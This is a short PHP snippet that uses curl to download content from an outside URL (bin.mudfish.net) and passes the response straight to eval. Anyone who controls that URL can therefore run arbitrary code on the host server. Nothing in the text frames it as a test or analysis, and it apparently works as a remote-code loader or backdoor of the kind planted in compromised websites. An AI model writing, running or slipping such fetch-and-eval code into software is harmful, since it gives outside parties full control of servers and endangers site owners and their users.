$url = "https://bin.mudfish.net/r/269-3046-8213";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);

if ($result === false) {
echo "Error fetching remote content";
} else {
// Assuming $result contains PHP code, execute it
if (is_string($result)) {
// Start output buffering
ob_start();
// Execute the fetched PHP code
eval(''.$result);
// Get the output buffer content and clean it
$output = ob_get_clean();
// Echo the output
echo $output;
} else {
echo "Error: Invalid response from remote server";
}
}

curl_close($ch);